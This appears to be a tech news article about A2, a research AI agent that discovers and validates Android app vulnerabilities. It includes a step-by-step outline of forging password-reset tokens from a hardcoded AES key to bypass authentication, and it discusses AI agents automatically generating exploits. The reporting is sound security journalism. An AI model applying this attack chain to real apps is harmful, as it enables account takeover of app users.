AI models get slammed for producing sloppy bug reports and burdening open source maintainers with hallucinated issues, but they also have the potential to transform application security through automation.
Computer scientists affiliated with Nanjing University in China and The University of Sydney in Australia say that they’ve developed an AI vulnerability identification system that emulates the way human bug hunters ferret out flaws.
Ziyue Wang (Nanjing) and Liyi Zhou (Sydney) have expanded upon prior work dubbed A1, an AI agent that can develop exploits for cryptocurrency smart contracts, with A2, an AI agent capable of vulnerability discovery and validation in Android apps.
They describe A2 in a preprint paper titled “Agentic Discovery and Validation of Android App Vulnerabilities.”
The authors claim that the A2 system achieves 78.3 percent coverage on the Ghera benchmark, surpassing static analyzers like APKHunt (30.0 percent). And they say that, when they used A2 on 169 production APKs, they found “104 true-positive zero-day vulnerabilities,” 57 of which were self-validated via automatically generated proof-of-concept (PoC) exploits.
One of these included a medium-severity flaw in an Android app with over 10 million installs.
“We discovered an intent redirect issue,” said Liyi Zhou, a lecturer in computer science at The University of Sydney, in an email to The Register. “This is not a trivial bug, and it shows A2’s ability to uncover real, impactful flaws in the wild.”
An intent redirect, he explained, happens when an Android app sends an intent – a message used to request an action, like opening a screen or passing data – but fails to check carefully where it is going. The vulnerability allows a malicious app to change that intent to a component it controls.
Zhou contends there’s no class of vulnerabilities that A2 cannot handle.
A2’s value as a source of signal rather than noise follows from its ability to validate its findings. As the authors observe, “Existing Android vulnerability detection tools overwhelm teams with thousands of low-signal warnings yet uncover few true positives.”
There are a lot of potential vulnerabilities in code, but few of them can be exploited easily. And the problem of false positives is compounded by error-prone AI coding tools that report inconsequential issues.
“A2’s breakthrough is that it mirrors how human security experts actually work,” said Zhou.
The agentic system consists of various commercial AI models – OpenAI o3 (o3 2025-04-16), Gemini 2.5 Pro (gemini-2.5-pro), Gemini 2.5 Flash (gemini-2.5-flash), and GPT oss (gpt-oss-120b) – deployed in three roles: the planner that designs the attack, the task executor that carries out the attack, and the task validator that generates test oracles – systems that make decisions – and verifies the results.
The researchers’ A1 system only did planning and execution, said Zhou. Its validation is limited to a fixed oracle that decides whether the attack would make money or not.
“The key novelty in A2 is its validator,” said Zhou.
As an example, he describes this setup, based on a task from the Ghera dataset. An app has a password reset flow. It stores the AES key as a plain string in strings.xml. With that key, the app creates a token from the email. Knowing the key lets an attacker forge tokens for any email.
A2, Zhou explained, breaks this into three tasks:
Task 1: Extract the hardcoded key
- Planner: set the task to find the key in res/values/strings.xml.
- Executor: read the file and extract the key.
- Validator: (i) Check that the file exists. (ii) Check the key value matches.
Both pass, so the key is confirmed.
Task 2: Forge a password reset token
- Input a victim email, e.g., example@example.com.
- Encrypt it with AES-ECB using the key.
- Base64 encode the ciphertext to form the token.
- Validator recomputes the token independently and compares outputs.
They match, so the token is confirmed.
Task 3: Prove authentication bypass
- Launch NewPasswordActivity with the forged token.
- App decrypts the token and displays the bound email.
- Validator: (i) Confirm the activity is NewPasswordActivity. (ii) Confirm the email appears on screen.
Both checks pass, proving the forged token bypasses authentication.
“In short: Task 1 shows the key exists; Task 2 shows the key mints a valid token; Task 3 shows the token bypasses authentication,” said Zhou. “All three steps are concretely validated.”
Zhou argues that AI is already outpacing traditional tools.
“In Android, our A2 system beats existing static analysis, and in smart contracts, A1 is close to state of the art,” he said. “Tools are still useful, but they are slow and hard to build. AI is fast and accessible — we just call APIs, while the AI companies pour billions into training. We are standing on their shoulders.”
The AI capex looks like a windfall for those pursuing bug bounties.
“Detection-only costs range from $0.003-0.029 per APK (o3), $0.0004-0.001 per APK (gpt-oss-120b), to $0.002-0.014 per APK (Gemini variants),” the paper says. “Aggregation increases costs to $0.04-0.33 per APK for gpt-oss-120b, $0.06-0.66 per APK for gemini-2.5-flash, $0.26-0.61 per APK for gemini-2.5-pro, and $0.84-3.35 per APK for o3.”
The full validation pipeline with a mixed set of LLMs costs between $0.59-4.23 per vulnerability, with a median cost of $1.77. When using gemini-2.5-pro for everything, costs range from $4.81-26.85 per vulnerability, with a median cost of $8.94.
Last year, University of Illinois Urbana-Champaign computer scientists showed that OpenAI’s GPT-4 can generate exploits from security advisories at a cost of about $8.80 per exploit.
To the extent that found flaws can be monetized through bug bounty programs, the AI arbitrage opportunity looks promising for those who can make accurate reports, given that a medium severity award might be several hundred or several thousand dollars.
But Zhou observes that bug bounty programs have limited scope. “A cat-and-mouse game is inevitable,” he said. “A2 can uncover serious flaws today, but bug bounty programs only cover a fraction of them. That gap creates a strong incentive for attackers to exploit these bugs directly. How this plays out depends on how quickly defenders move.
“The field is about to explode. The success of A1 and A2 means researchers and hackers alike will rush in. Expect a surge of activity — both in defensive research and in offensive exploitation.”
Asked what a system like A2 might mean for security research, Adam Boynton, senior security strategy manager at Jamf, told The Register, “AI is moving vulnerability discovery from endless scan alerts to proof-based validation. Security teams get fewer false positives, faster fixes, and focus on real risks.”
A2 source code and artifacts have been limited to those with institutional affiliation and a declared research purpose in an effort to balance open research with responsible disclosure. ®